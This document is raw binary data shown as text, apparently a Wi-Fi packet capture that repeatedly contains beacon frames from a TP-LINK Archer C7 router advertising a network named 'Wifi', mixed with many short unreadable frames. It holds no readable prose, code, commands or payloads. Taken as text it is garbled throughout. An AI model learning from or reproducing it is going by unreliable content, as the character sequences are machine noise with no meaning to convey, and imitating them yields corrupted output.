4$Z}C klف]."@[\|}+{v/)PJ=H(+Z7zx)h.%mz=xc?s=;=Z ,>HMZ{ ؗFؐZ mkZ $ !!@mklw5mklZ* lw5Z* !!:lw5mkmkPZ f,>HMZ` B^mklw5D"`=@C1-> lk r({6\ۿf&Y4bcLmT?`'vUfFzR,}!eц &KL)4ԶcеBI> \lKS/~׊V`U9؜K2zF\s^_B*(oyt yi#zop~qx{m6mҙ(z)Z mkZ mkZB ;^m4%Z ppP:.mkmkD`od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmkD`od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZlw5mkPZlw5mkPZ mkZ mkZ;^m4%Z;^m4%Z;^m4%Z ppP:.mkmkEbod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ.ppP:.mkmkE*bod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZTppP:.mkmk E Pbod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ;^m4%Z;^m4%ZB;^m4% ZD;^m4%@Z mkZ;^m4%Z ;^ȑZ;^m4%pZ;^m4%Z4;^m4%Z@ r;^ȑZ@;^m4%@ZX;^m4%Z\ z;^ȑZ\;^m4%Zl;^m4%Ztlw5mkPZt mkZ;^m4%?Z;^m4%Z ;^ȑZ;^m4%Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z mkZ;^m4%Z mkZ `48Z;^m4%Zd v;^ȑZ4 mkZ mkZz B^mklw5E#`)(T:1W%(7&+;+&3aՖʠC(+ gF& E#4>}({sUl}aN_2{D!?z7._mV$nsl :"]5-7 4K٦SIdMRyLW?`^>|7El 0n;X[hum'*{Zd=r]HkO, j%jMsI-2 шe3̎9#A1]T@BQ D2W葱Z~ B^mklw5E$`@p+#x%BtY]߬(W74i:nKݩaǁkuʖ!ġZ)$/'I#@)c7_^݇cED¯ojY '*gBV{02/JSHMZ mkZ mkZx mkZ mkZ mkZ lw5mkPZ PPB^mklw5PF%`v޷LSѰj1c0VfcymQmy3UZ ;^m4%ZH ;^m4%Z 2;^ȒZ >;^ȓZ;^m4%ZB;^m4%Z ;^ȓZ;^m4%`?Zb ;^m4%Z*;^m4%Z* ;^ȓZ*b ;^m4%Z8;^m4%Z:b ;^m4%ZR;^m4%Zn v;^ȓZn;^m4%Z;^m4% Z B;^ȓZ;^m4%Z8 ;^ȓZd;^m4%Zr b;^ȓZ;^m4%?Z;^m4%0Z;^m4%Z4;^m4%Z ;^ȓZ;^m4%Z;^m4%Z ;^ȓZ j;^ȓZ;^m4%Z<;^m4%ZX ;^ȓZ n;^ȓZ;^m4%Z;^m4%`Z;^m4%Z" j;^ȓZ<;^m4%ZR j;^ȓZR;^m4%Z` v;^ȓZ ;^ȓZ;^m4%?Z f;^ȓZ`BmkmkF&`u+!Sqk(_6Dutnxq}6Z/l"VF  ʔ] (9*LC[h`l(\Acƞ͒U32)܈;6̍;TYZ >;^m4%Z j;^ȓZ ;^m4%Z ;^m4%Z j;^ȓZ$ j;^ȓZ& j;^ȓZ& ;^m4%0Z. lw5mkPZ. lw5mkPZ& mkZ mkZ mkZ mkZ mkZ mklw5 ZX lw5mkPZx mkZ mkZ mkZ mkZppP:֒ބmkmk@G+od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZFppP:.gmkmk`G od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.gmkmkGTod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZppP:> mkmkGCod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:> mkmkG(Pod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZXppP:.;mkmkHod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZhppP:.;mkmkHZ)od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.;mkmkH6od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.;mkmkHBod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ;^ȔZ ;^ȔZ ;^m4%PZ$ ;^m4%Z j;^ȔZ;^m4%0Zb ;^m4%Zb ;^m4%Z ;^m4%Z;^m4%Z;^m4%0Zf ;^m4%ZJ;^m4%Z ;^ȔZ;^m4%Z;^m4%Z j;^ȔZppP:.mkmkPH3od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ;^m4%Z ;^m4%`ZB;^m4%Z;^m4%ZppP:.mkmkpHod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZZ;^m4%Z;^m4%Z;^m4%Z;^m4%+Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z:>;^m4%Z:;^m4%ZB j;^ȕZ ;^ȕZ ;^ȕZ;^m4%0Z;^m4%Z;^m4%Z;^m4%ZN;^m4%Z *;^ȕZ;^m4%`ZX j;^ȕZZ;^m4%Z ;^ȕZ;^m4%Z;^m4%Z;^m4%ZX;^m4%Zz ;^ȕZz;^m4%Zz j;^ȕZz;^m4%0Z;^m4%Z;^m4%Z;^m4%Z ;^ȕZ0V ;^m4%Zn;^m4%Zp;^m4%Zr;^m4%Zt f;^ȕZv;^m4%Z j;^ȕZ;^m4%`Z;^m4%pZ;^m4%Z  ;^ȕZ>;^m4%Zt B;^ȕZx;^m4%@Z|;^m4%Z;^m4%Z ;^ȕZ;^m4%?Z>;^m4%Z j;^ȕZ;^m4%Z j;^ȕZ* j;^ȕZ >;^m4%Z j;^ȕZ j;^ȕZ ;^m4%Z j;^ȕZ ;^m4% Z ;^m4%@Z v;^ȕZ ;^m4%PZ j;^ȕZ ;^m4%Z 8G薱Z ܅Z1 ,>HMZx ;^m4%Z >;^m4%Z j;^ȖZ ;^m4%Z ;^m4%Z ;^m4%9Z ;^m4%PZ ;^m4%Z 2;^ȖZn;^m4%Z ;^m4%Z ;^ȖZ;^m4%Z$ j;^ȖZ> ;^ȗZ;^m4%`Z;^m4%Z;^m4%Z";^m4%Z" V;^ȗZ* n;^ȗZ;^m4%Z;^m4%Z;^m4%Z ;^ȗZCwVkXZCwVkXZ rVkXZ VkXCwZ;^m4%Z;^m4%Z<;^m4%Z>;^m4%Z v;^ȗZ;^m4%Z j;^ȗZ;^m4%`Z;^m4%Z;^m4%Z;^m4%Z ;^m4%Z$N;^m4%ZX ;^ȗZX;^m4%ZX;^m4%ZX;^m4%ZX;^m4%Z ;^ȗZ;^m4%@Z;^m4%Z;^m4%Z j;^ȗZ j;^ȗZ;^m4% Z;^m4%Z$ f;^ȗZ&;^m4%PZ&;^m4%p?Z(;^m4%Z(;^m4%ZT;^m4%Z;^m4%Z ;^ȗZ;^m4%Z;^m4% Z>;^m4%ZbN ;^m4%ZtN ;^m4%ZppP:.gmkmkJnod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ;^m4%`ZppP:.gmkmkJ'fod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ;^ȗZN;^m4%Z^ ;^ȗZb;^m4%Zf;^m4% Z 8G藱Z ;^m4%0Z2 ;^m4%Z2 ;^m4%ZT ;^m4%Z j;^ȗZ ;^m4%@Z f;^ȗZ ;^m4%Z ;^m4%Z j;^ȗZ ;^m4%Z ;^m4%Zx +@Z@;^m4%ZL r;^ȘZL ;^ȘZP;^m4%ZT ;^m4%ZT ;^m4%Z A-GZ ;^m4%Z ;^m4%Z ;^m4%Z VkXZ CwȘZ> z;^ȘZV ;^m4%ZV ;^m4%Zt ;^m4%Z@ >;^m4%ZD >;^m4%ZF ;^m4%ZJ ;^m4%ZR ;^m4%Z^ ;^ȘZn ;^m4%P Zz b ;^m4%Z~ j;^ȘZ~ ;^m4% Z ;^m4%Z ;^ȘZ ;^m4%Z ;^ȘZt;^m4% Zx;^m4%p Z;^m4%Z;^m4%Z;^m4%Z0;^m4%Z0;^m4%Z8 ;^șZX ;^șZ;^m4%Z;^m4%Z ;^m4%ZL;^m4%?Z` ;^șZ`;^m4%Zx;^m4%Z~ ;^m4%Z ;^m4%Z.;^m4%Z;^m4%ZppP:.mkmkPKod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZB v;^șZR j;^șZR;^m4%@Zh;^m4%`Zt;^m4%Zv;^m4%Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z ;^șZ;^m4%Z;^m4%ZB;^m4%Z f;^șZ ;^șZN;^m4%Z;^m4%0ZN;^m4%Z";^m4%Z.;^m4%Z<;^m4%ZD j;^șZH;^m4%@ZHV ;^m4%ZZ v;^șZZ;^m4%PZv ;^șZx;^m4%Z v;^șZ;^m4%Z 8G虱Z;^m4%Z>;^m4%Z;^m4%Z v;^șZ;^m4%Z;^m4%0Z>;^m4%Z j;^șZ z;^șZ;^m4%0Z;^m4%PZ>;^m4%Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z r;^șZ;^m4%`Z*;^m4%Z.>;^m4%ZX;^m4%Z^V ;^m4%Z.;^m4%ZP;^m4%Zl;^m4%Zn;^m4%Zv ;^șZz;^m4% Z|;^m4%Z;^m4%ZB;^m4%Z ;^m4%Z\;^m4%Z;^m4%@Z;^m4%Z ;^șZ;^m4%ZBmkmkK(`^M*\c;* z7 ]*/x t}B(V^ޣcpu 5Fɭ8vIZK_9)XP FؾЅ2T?7UzJԡx^ͤ& |xS^ѰUUXC2I~)ّaAA jf_`QO4QΙZ ;^m4%Z ;^m4%Z >;^m4%Z >;^m4%Z ;^m4%Z j;^șZ ;^m4%Z" >;^m4%Z" ;^m4%Zd j;^șZ ;^m4%Z ;^m4%Z ;^m4%Z ;^m4%Z  105, ZDPPB^mklw5K)`Y/4 VCI;^m4%p%ZF;^m4%`%)Z\ ;^țZd j;^țZd ;^m4%Z;^m4%0'Z ;^m4%Z^ ;^m4%Z;^m4%'Z;^m4%Z`;^m4%Zt v;^țZt;^m4%(Zt;^m4%Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z j;^țZ;^m4%Z ~;^țZ ;^m4%Z>;^m4%Z>;^m4%+ZJ;^m4%+ZJ;^m4%ZP;^m4%,ZT;^m4%Z;^m4%p,Z;^m4%@-Z ;^țZ;^m4%P-Z" ;^m4%Zj;^m4%.Z j;^țZrppP:.gmkmkMod1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ mkZppP:.gmkmkM.od1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ;^m4%/?Z;^m4%Z;^m4%Z;^m4%Z;^m4%Z ;^m4%/?Z ;^m4%0Z, ;^m4%Z;^m4%Z j;^țZ;^m4%p3?ZF ;^țZZ f;^țZ`;^m4%07Z` ;^m4%Z j;^țZ;^m4%7Z;^m4%Z;^m4%Z;^m4%Z;^m4%@8Z>;^m4%Z v;^țZ;^m4%8Z v;^țZ;^m4%8Z ZL ;^m4%Zj ;^m4%Zv ;^m4%Zx ;^m4%Z ;^m4%Z ;^m4%Z >;^m4%Z ;^m4%p9Z ;^m4%Z ;^m4%Z N;^m4%Z N;^m4%Z ;^m4%Z ;^m4%9Z0 j;^țZCwVkXZxBmkmkM,`Oт^4$_/f׍WVUi%@ь'O]7erZUҌI0 n~6x1fʮĩӸbBlN^#b&Mvϥ֜Z  VkXZ CwȜZHppP:.mkmkMEpd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmkN}pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:.mkmkNvpd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ* ppP:.mkmk Npd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ* ppP:.mkmk@Npd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ;^m4%Z@ :mkmkZ@ :mkmkZ@ :mkmk Z@ mkmkZ@ mkmkZ@ mkmk Z@ :mkmk0Z@ :mkmk@Z@ mkmk0Z@ mkmk@Z@ :mkmkPZ@ mkmkPZ@ :mkmk`Z@ :mkmkpZ@ mkmk`Z@ :mkmkZ@ mkmkpZ@ mkmkZ@ :mkmkZ@ :mkmkZ@mkmkZ@:mkmkZ@ mkmkZ@ mkmkZ@:mkmkZ@:mkmkZ@$:mkmkZ@&mkmkZ@&mkmkZ@&mkmkZ@.:mkmkZ@0mkmkZ@6:mkmkZ@8mkmkZ@@:mkmkZ@H:mkmk Z@PmkmkZ@Pmkmk Z@R:mkmk0Z@Z:mkmk@Z@\mkmk0Z@\mkmk@Z@b:mkmkPZf F;^ȜZh;^m4% :?Zl^;^m4%Z@lmkmkPZ@l:mkmk`Z@v:mkmkpZ@~:mkmkZ@mkmk`Z@mkmkpZ@mkmkZ ;^m4%Z@:mkmkZ@:mkmkZ@:mkmkZ;^m4%Z@mkmkZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@mkmkZ@:mkmkZ@mkmkZ@:mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@mkmkZ@:mkmk Z ;^ȜZ@:mkmk0Z;^m4%0<Z@mkmk Z@mkmk0Z@:mkmk@Z@mkmk@Z@:mkmkPZ@:mkmk`Z@mkmkPZ@mkmk`Z@ :mkmkpZ  ;^m4%Z@:mkmkZ@mkmkpZ@mkmkZ;^m4%Z@:mkmkZ@$:mkmkZ* ;^ȜZ,;^m4%>Z,;^m4%>Z@,mkmkZ@.:mkmkZ.;^m4%Z@0mkmkZ6;^m4%>Z@::mkmkZ:;^m4%Z@B:mkmkZ@mkmkZ@mkmkZ@ :mkmkZ@ mkmkZ@ mkmkZ@:mkmkZ@:mkmkZ@&:mkmkZ@(mkmkZ@(mkmkZ0;^m4%Z@0:mkmk Z@<:mkmk0Z@H:mkmk@ZJ;^m4% ?Z@P:mkmkPZ@XmkmkZ@Xmkmk Z@X:mkmk`Z@d:mkmkpZ@lmkmk0Z@l:mkmkZ@v:mkmkZ@vmkmk@Z@vmkmkPZ@:mkmkZ@mkmk`Z@:mkmkZ@mkmkpZ@:mkmkZ@:mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@mkmkZ;^m4%Z@:mkmkZ@:mkmkZ@:mkmk Z;^m4%Z ;^ȝZ;^m4%P@Z@:mkmk0Z@:mkmk@Z@:mkmkPZ@mkmkZ@mkmkZ@mkmkZ ;^ȝZ@:mkmk`Z@mkmkZ@mkmkZ;^m4%@Z@mkmkZ@mkmkZ@:mkmkpZ@mkmk Z@mkmk0Z@mkmk@Z@:mkmkZ@mkmkPZ@mkmk`Z@ :mkmkZ@mkmkpZ@mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ@mkmkZ@(:mkmkZ@0:mkmkZ@4mkmkZ@4mkmkZ@<:mkmkZ@<mkmkZ@D:mkmkZ@N:mkmkZ@Z:mkmkZ@ZmkmkZ@ZmkmkZ@ZmkmkZ@f:mkmk Z@n:mkmk0Z@rmkmk Z@rmkmk0Z@x:mkmk@Z@zmkmk@Z@:mkmkPZ@mkmkPZ;^m4%Z@:mkmk`Z@:mkmkpZ@:mkmkZ@mkmk`Z@mkmkpZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ;^m4%Z@:mkmkZ;^m4%Z;^m4%AZ@mkmkZ@mkmkZ@:mkmk Z@:mkmk0Z@ mkmk Z@ mkmk0Z@:mkmk@Z@:mkmkPZ@$:mkmk`Z@(mkmk@Z@(mkmkPZ@,:mkmkpZ@4mkmk`Z@4mkmkpZ@4:mkmkZ8 ;^ȝZ:;^m4%BZ@:mkmkZ@>:mkmkZ@FmkmkZ@F:mkmkZP;^m4%Z@P:mkmkZP;^m4%Z@PmkmkZ@PmkmkZ@\:mkmkZ@d:mkmkZ@l:mkmkZ@pmkmkZ@pmkmkZ@t:mkmkZ@zmkmkZ@~:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmk Z@mkmkZ@mkmk Z@:mkmk0Z@:mkmk@Z@mkmk0Z@:mkmkPZ@mkmk@Z@mkmkPZ@:mkmk`Z j;^ȝZ@mkmk`Z@:mkmkpZ@:mkmkZ@:mkmkZ@mkmkpZ@mkmkZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ;^m4%Z;^m4%Z@mkmkZ@:mkmkZ v;^ȝZ@mkmkZ@:mkmkZ@:mkmkZ@mkmkZ@mkmkZ@:mkmkZ@mkmkZ4 j;^ȝZZ j;^ȝZ^;^m4%CZ^;^m4%CZ^;^m4%DZppP:lw5mkmk`87pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ,ppP:lw5mkmk`Dpd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ8ppP:lw5mkmk`Ppd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZFppP:lw5mkmk`]pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ V;^ȝZ;^m4% E?Z;^m4% HZ ;^ȝZp ;^ȝZ;^m4% JZ;^m4%JZ;^m4%Z,;^m4%Z;^m4%Z;^m4% OZ;^m4%Z;^m4%Z( ;^ȝZ.;^m4%OZ.;^m4%ZL;^m4%ZN;^m4%ZT;^m4%Z;^m4%PZppP:lw5mkmkp> pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZppP:lw5mkmkp pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@:lw5mkmkZppP:lw5mkmkp pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@:mklw5mkZ@:lw5mkmkZ@:mklw5mkZppP:lw5mkmkp!pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@:lw5mkmk ZppP:lw5mkmkW!pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@:mklw5mk0Z@:lw5mkmk Z@:mklw5mk0Z@ :lw5mkmk@ZppP:lw5mkmk*!pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@:lw5mkmk@Z@:mklw5mkPZppP:lw5mkmk7!pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@$:mklw5mkPZ@*:lw5mkmk`Z@0:lw5mkmk`Z@2:mklw5mkpZ@@:mklw5mkpZ@D:lw5mkmkZ@L:lw5mkmkZ@L:mklw5mkZ@Z:lw5mkmkZ@Z:mklw5mkZ@d:mklw5mkZ lw5Z lw5Z lw5Z@:lw5mkmkZ@:mklw5mkZ lw5Z@:lw5mkmkZ v;^ȝZ;^m4%SZ;^m4%Z@:mklw5mkZ@:lw5mkmkZ@:lw5mkmkZ lw5Z@:mklw5mkZ@:mklw5mkZ@:lw5mkmkZ@:mklw5mkZ lw5Z@:lw5mkmkZ@:mklw5mkZ@:lw5mkmk Z@:lw5mkmkZ@:mklw5mkZ@:lw5mkmk Z@:mklw5mk0Z;^m4%0TZ@:mklw5mk0Z@:lw5mkmk@Z lw5Z@:lw5mkmk@Z@:mklw5mkPZ lw5Z@ :lw5mkmk`Z@ :mklw5mkPZ lw5Z@ :mklw5mkpZ@ :lw5mkmk`Z@ :mklw5mkpZ@" :lw5mkmkZ( lw5Z@, :mklw5mkZ@< :lw5mkmkZ@< :lw5mkmkZ@< :mklw5mkZ@H :mklw5mkZ@L :lw5mkmkZ@L :mklw5mkZR lw5Z@\ :lw5mkmkZ\ lw5Z@f :mklw5mkZ@v :lw5mkmkZ@v :mklw5mkZz lw5Z@ :lw5mkmkZ@ :mklw5mkZ ppP:lw5mkmkN("pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@ :lw5mkmkZ ppP:lw5mkmkN"pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ ppP:lw5mkmkN"pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@ :lw5mkmk Z ppP:lw5mkmkN"pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ@ :mklw5mkZ@ :lw5mkmk Z@ :mklw5mk0Z@ :lw5mkmk@Z@ :mklw5mk0Z@ :lw5mkmk@Z@ :mklw5mkPZ@ :mklw5mkPZ@ :lw5mkmk`Z@ :mklw5mkpZ@ :lw5mkmk`Z lw5Z@ :lw5mkmkZ@ :mklw5mkpZ lw5Z lw5Z@ :mklw5mkZ lw5Z@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@( :mklw5mkZ@. :lw5mkmkZ@. :mklw5mkZ@8 :lw5mkmkZ< lw5Z@B :mklw5mkZ@N :lw5mkmkZ@N :mklw5mkZP lw5Z@V :lw5mkmkZZ lw5Z@` :mklw5mkZ@b :lw5mkmkZ@b :mklw5mkZ@p :lw5mkmkZ@x :mklw5mkZ lw5Z@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmk Z lw5Z@ :lw5mkmk Z@ :mklw5mk0Z@ :lw5mkmk@Z@ :mklw5mk0Z@ :mklw5mkPZ@ :lw5mkmk@Z@ :mklw5mkPZ lw5Z@ :lw5mkmk`Z lw5Z@ :mklw5mkpZ lw5Z@ :lw5mkmk`Z@ :mklw5mkpZ@ :lw5mkmkZ@ :mklw5mkZ lw5Z@ :lw5mkmkZ@ :mklw5mkZ lw5Z@ :lw5mkmkZ@ :lw5mkmkZ@ :mklw5mkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ, lw5Z@, :lw5mkmkZ@. :mklw5mkZ@4 :lw5mkmkZ: lw5Z@: :lw5mkmkZ@D :mklw5mkZ@R :mklw5mkZ@V :lw5mkmkZ@^ :mklw5mkZ@` :lw5mkmkZ@` :mklw5mkZ@p :lw5mkmk Z@x :mklw5mk0Zz lw5Z@ :lw5mkmk Z@ :mklw5mk0Z@ :lw5mkmk@Z lw5Z@ :lw5mkmk@Z@ :mklw5mkPZ lw5Z lw5Z@ :lw5mkmk`Z@ :mklw5mkPZ@ :lw5mkmk`Z@ :mklw5mkpZ@ :lw5mkmkZ lw5Z@ :mklw5mkZ@ :mklw5mkpZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ lw5Z@ :mklw5mkZ lw5Z@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :lw5mkmkZ lw5Z@ :mklw5mkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ( lw5Z@, :lw5mkmkZ@6 :mklw5mkZ@B :lw5mkmkZ@B :mklw5mkZ@H :lw5mkmk Z@P :mklw5mk0Z@R :lw5mkmk ZV lw5Z@^ :mklw5mk0Z@d :lw5mkmk@Z@l :lw5mkmk@Z@l :mklw5mkPZn lw5Z@t :mklw5mkPZz lw5Z@ :lw5mkmk`Z@ :mklw5mkpZ@ :lw5mkmk`Z@ :mklw5mkpZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ lw5Z@ :mklw5mkZ@ :lw5mkmkZ lw5Z@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ lw5Z@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ* lw5Z@, :lw5mkmkZ@, :mklw5mkZ@2 :lw5mkmk Z6 lw5Z@< :lw5mkmk Z@< :mklw5mk0ZL lw5Z@L :lw5mkmk@Z@V :mklw5mk0Z@V :lw5mkmk@Z@V :mklw5mkPZ` lw5Z@` :mklw5mkPZ@h :lw5mkmk`Z@h :lw5mkmk`Z@p :mklw5mkpZ@~ :lw5mkmkZ lw5Z@ :mklw5mkZ@ :mklw5mkpZ@ :lw5mkmkZ@ :mklw5mkZ lw5Z ;^ȝZ ;^m4%@TZ@ :lw5mkmkZ@ :lw5mkmkZ@ :mklw5mkZ lw5Z@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ@ :mklw5mkZ@ :lw5mkmkZ@ :mklw5mkZ ;^ȝZ ;^m4%`TZ@ :lw5mkmkZ@ :mklw5mkZ@ :lw5mkmkZ@:mklw5mkZ@:lw5mkmkZ>;^m4%Z j;^ȝZ@:mklw5mkZ;^m4%TZ@:lw5mkmk Z lw5Z@:lw5mkmk Z lw5Z@:mklw5mk0Z@0:lw5mkmk@Z@<:mklw5mkPZ@<:mklw5mk0Z@<:lw5mkmk@Z@J:lw5mkmk`Z@J:mklw5mkPZP lw5Z@T:mklw5mkpZT j;^ȝZT;^m4%0UZ@V:lw5mkmk`Z@V:mklw5mkpZZ lw5Z@r:lw5mkmkZ@x:lw5mkmkZ@|:mklw5mkZ@:mklw5mkZ@:lw5mkmkZ lw5Z@:mklw5mkZ@:lw5mkmkZ@:mklw5mkZ@:lw5mkmkZ@:mklw5mkZ lw5Z@:lw5mkmkZ@:mklw5mkZ lw5Z@:lw5mkmkZ@:mklw5mkZ@:lw5mkmkZ@:mklw5mkZ lw5Z" lw5Z lw5Z0TCwlc{ }ZppP:lw5mkmkO=*pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 